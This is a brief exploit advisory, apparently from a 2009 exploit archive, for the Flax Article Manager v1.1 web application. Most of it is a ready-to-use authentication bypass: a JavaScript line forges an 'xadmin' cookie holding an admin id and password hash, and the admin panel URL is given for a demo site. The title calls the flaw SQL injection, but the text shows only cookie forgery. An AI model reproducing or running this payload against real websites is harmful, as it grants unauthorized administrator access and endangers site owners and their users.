---------------------------------------------------------------
---------------------------------------------------------------
Flax Article Manager v1.1 Bypass Cookie SQL Injection Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:www.h4ckf0ru.com
Script:Flaxweb - Article management system v1.1
Download:http://www.articlesitedemo.com/
---------------------------------------------------------------
Exploit
-------
1/ javascript:document.cookie="xadmin=1%2C21232f297a57a5a743894a0e4a801fc3;path=/";
2/ (1%2C21232f297a57a5a743894a0e4a801fc3) is id and password of login to site :)
----------------------------------------------------------------
Dem0
----
http://www.articlesitedemo.com/admin/admin.php
--------------------------------------
Greeting To ALL My Friends (Dz)
# [2009-05-26]
|